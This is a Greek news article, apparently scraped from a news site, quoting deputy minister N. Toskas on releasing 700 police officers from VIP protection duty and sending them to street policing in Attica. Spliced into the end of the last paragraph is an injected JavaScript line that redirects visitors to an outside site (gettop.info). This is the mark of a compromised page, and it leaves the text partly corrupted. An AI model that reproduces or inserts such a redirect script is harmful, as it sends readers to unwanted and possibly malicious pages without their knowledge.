Τόσκας: Οι αστυνομικοί δεν είναι ούτε υπηρέτες ούτε ορντινάτσες κάποιων

0
6

 

«Οι αστυνομικοί δεν είναι ούτε υπηρέτες, ούτε ορντινάτσες κάποιων. Είναι υπηρέτες του κοινωνικού συνόλου. Η αποδέσμευση των αστυνομικών από τη φύλαξη υψηλών προσώπων θα ολοκληρωθεί μέσα στο Σεπτέμβριο. Αυτή η κυβέρνηση είναι αποφασισμένη να εξυπηρετήσει το κοινωνικό σύνολο»,  όωπς σημείωσε μιλώντας στο Αθηναϊκό Πρακτορείο ο αναπληρωτής υπουργός Προστασίας του Πολίτη, Ν. Τόσκας, στέλνοντας ένα σαφές μήνυμα προς πολλές κατευθύνσεις, σχετικά με το πολύκροτο θέμα της αποδέσμευσης αστυνομικών από υψηλά πρόσωπα, που ξεκινά άμεσα να υλοποιείται.

«Διαχρονικά είχε δημιουργηθεί μία ανεξέλεγκτη κατάσταση. Με μεγάλο βαθμό αυθαιρεσίας διατίθεντο οι αστυνομικοί για την ασφάλεια υψηλών, εντός εισαγωγικών, προσώπων, τα οποία, σε πολλές περιπτώσεις, δεν είχαν ανάγκη φύλαξης από αστυνομικούς», τόνισε ο κ. Τόσκας και πρόσθεσε: «Συγκροτήθηκε μία επιτροπή, τον Απρίλιο, η οποία εξέτασε όλες τις περιπτώσεις. Εξετάστηκαν συνολικά 702 περιπτώσεις, σε διάφορες κατηγορίες. Από βουλευτές, μέλη της κυβέρνησης, πρώην βουλευτές, δημάρχους, περιφερειάρχες, αστυνομικούς εν αποστρατεία, δημοσιογράφους, επιχειρηματίες και δικαστικούς, οι οποίοι είχαν αστυνομικούς στην ασφάλειά τους. Ο συνολικός αριθμός των αστυνομικών που απασχολούνται στα υψηλά πρόσωπα υπερβαίνει τις 2.500, ενώ παράλληλα έχουν διατεθεί συνολικά 290 αυτοκίνητα και 114 μοτοσυκλέτες».

Όπως υπογράμμισε ο αναπληρωτής υπουργός Προστασίας του Πολίτη, σε πρώτη φάση αποδεσμεύονται 700 αστυνομικοί και ταυτόχρονα 67 αυτοκίνητα και 20 μοτοσυκλέτες, με απόφαση της επιτροπής, η οποία εξέτασε εάν πραγματικά υπάρχει κίνδυνος ή όχι.

«Και η αποδέσμευση αρχίζει από αυτές τις ημέρες. Άσχετα ποια είναι η οργανωτική τους θέση – γιατί κακά τα ψέματα κάποιοι είχαν μεθοδεύσει να έχουν οργανικές θέσεις «πολυτελείας»- θα πάνε εκεί που υπάρχει ανάγκη», σημείωσε ο κ. Τόσκας. «Και ανάγκη υπάρχει αυτήν τη στιγμή για την Αττική. Υπάρχει μεγάλη ανάγκη στη Δυτική Αττική, στο κέντρο, στη ΔΙΑΣ, στην Άμεση Δράση. Είναι γνωστές οι ανάγκες. Δηλαδή, στο πεζοδρόμιο, στον δρόμο, κοντά στον πολίτη. Θέλουμε να ενισχύσουμε την ασφάλεια του απλού πολίτη, που κυκλοφορεί και εργάζεται στους δρόμους. Αυτό θα γίνει πάρα πολύ γρήγορα. Δηλαδή, μέσα στον Σεπτέμβριο θα έχει ολοκληρωθεί η διαδικασία», συμπλήρωσε.

Αυτή η απόφαση του αναπληρωτή υπουργού Προστασίας του Πολίτη αναμένεται να προκαλέσει αντιδράσεις από ορισμένα υψηλά πρόσωπα. «Περιμένω μεγάλες αντιδράσεις», επεσήμανε ο ίδιος και τόνισε: «Ένας συνάδελφός σας μου τηλεφώνησε χθες στη Βουλγαρία όπου βρισκόμουν και έμμεσα με απείλησε λέγοντας «καλά – καλά θα δεις». Στη συνέχεια βγήκε στο ραδιόφωνο, στο οποίο εργάζεται και άρχισε να με κατηγορεί για άλλα θέματα, όχι για αυτό. Έκανε πικρόχολα σχόλια και στημένη κριτική για άλλα θέματα. Κάποιοι, είτε από μεγαλομανία, είτε επειδή χάνουν τους υπηρέτες τους, εντός εισαγωγικών, θα αντιδράσουν. Όμως, οι αστυνομικοί δεν είναι ούτε υπηρέτες, ούτε ορντινάτσες κάποιων. Είναι υπηρέτες του κοινωνικού συνόλου και όχι υπηρέτες ατόμων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here